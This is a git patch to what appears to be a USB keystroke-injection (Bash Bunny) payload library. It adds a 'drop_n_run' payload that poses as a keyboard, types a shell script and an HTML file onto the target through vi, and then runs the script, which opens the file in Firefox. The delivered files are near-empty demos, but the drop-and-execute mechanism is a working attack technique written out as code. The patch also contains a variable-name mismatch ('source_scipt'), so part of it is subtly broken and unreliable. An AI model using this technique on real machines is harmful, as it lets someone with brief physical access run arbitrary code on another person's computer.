From 5c764849f3120147968e2c86a282b99c87e66c13 Mon Sep 17 00:00:00 2001 From: bg-wa Date: Sat, 27 Jan 2018 10:31:59 -0800 Subject: [PATCH] Check Point --- payloads/extensions/drop.sh | 3 ++- .../library/exfiltration/drop_n_run/boom.html | 14 ++++++++++++++ payloads/library/exfiltration/drop_n_run/fuse.sh | 7 +++++++ .../payload.txt | 15 +++++++++------ 4 files changed, 32 insertions(+), 7 deletions(-) create mode 100644 payloads/library/exfiltration/drop_n_run/boom.html create mode 100644 payloads/library/exfiltration/drop_n_run/fuse.sh rename payloads/library/exfiltration/{optical-exfiltration => drop_n_run}/payload.txt (62%) diff --git a/payloads/extensions/drop.sh b/payloads/extensions/drop.sh index d8341fea..e3e983c2 100644 --- a/payloads/extensions/drop.sh +++ b/payloads/extensions/drop.sh @@ -7,14 +7,15 @@ # Example: # DROP /root/udisk/payloads/$SWITCH_POSITION/source.txt ~/target_destination.txt true source ./run.sh +source ./debug.sh function DROP() { + DEBUG "drop" "start" local source=$2 local destination=$3 local overwrite=$4 #local os= - ehco "start" >> "/root/udisk/payloads/${SWITCH_POSITION}/debug.txt" RUN terminal QUACK DELAY 1000 QUACK STRING vi "$destination" diff --git a/payloads/library/exfiltration/drop_n_run/boom.html b/payloads/library/exfiltration/drop_n_run/boom.html new file mode 100644 index 00000000..56e762c5 --- /dev/null +++ b/payloads/library/exfiltration/drop_n_run/boom.html @@ -0,0 +1,14 @@ + + + + + + Boom! + + + +
+ +
+ + \ No newline at end of file diff --git a/payloads/library/exfiltration/drop_n_run/fuse.sh b/payloads/library/exfiltration/drop_n_run/fuse.sh new file mode 100644 index 00000000..3a5f850c --- /dev/null +++ b/payloads/library/exfiltration/drop_n_run/fuse.sh @@ -0,0 +1,7 @@ +#!/bin/bash + +# Get out of bed and do something productive here instead... +sleep 10 + +# Kaboom!! +firefox "~/boom.html" \ No newline at end of file diff --git a/payloads/library/exfiltration/optical-exfiltration/payload.txt b/payloads/library/exfiltration/drop_n_run/payload.txt similarity index 62% rename from payloads/library/exfiltration/optical-exfiltration/payload.txt rename to payloads/library/exfiltration/drop_n_run/payload.txt index 580d5d1d..5a70ddb9 100755 --- a/payloads/library/exfiltration/optical-exfiltration/payload.txt +++ b/payloads/library/exfiltration/drop_n_run/payload.txt @@ -14,21 +14,24 @@ # | Attack Stage | Description | # | ------------------- | ---------------------------------------- | # | SETUP | Open vi | -# | ATTACK | Writing HTML | -# | FINISH | Browser Ready | +# | ATTACK | Writing files | +# | FINISH | Payload Dropped & ran (remove the bunny) | # ATTACKMODE HID LED SETUP -source_html="/root/udisk/payloads/${SWITCH_POSITION}/index.min.html" -target_html="~/index.html" -#date_time= +source_scipt="/root/udisk/payloads/${SWITCH_POSITION}/fuse.sh" +target_script="~/fuse.sh" + +source_html="/root/udisk/payloads/${SWITCH_POSITION}/boom.html" +target_html="~/boom.html" LED ATTACK +DROP $source_script $target_script DROP $source_html $target_html -RUN LINUX "firefox ${target_html}" +RUN LINUX "${target_script}" Q ENTER LED FINISH \ No newline at end of file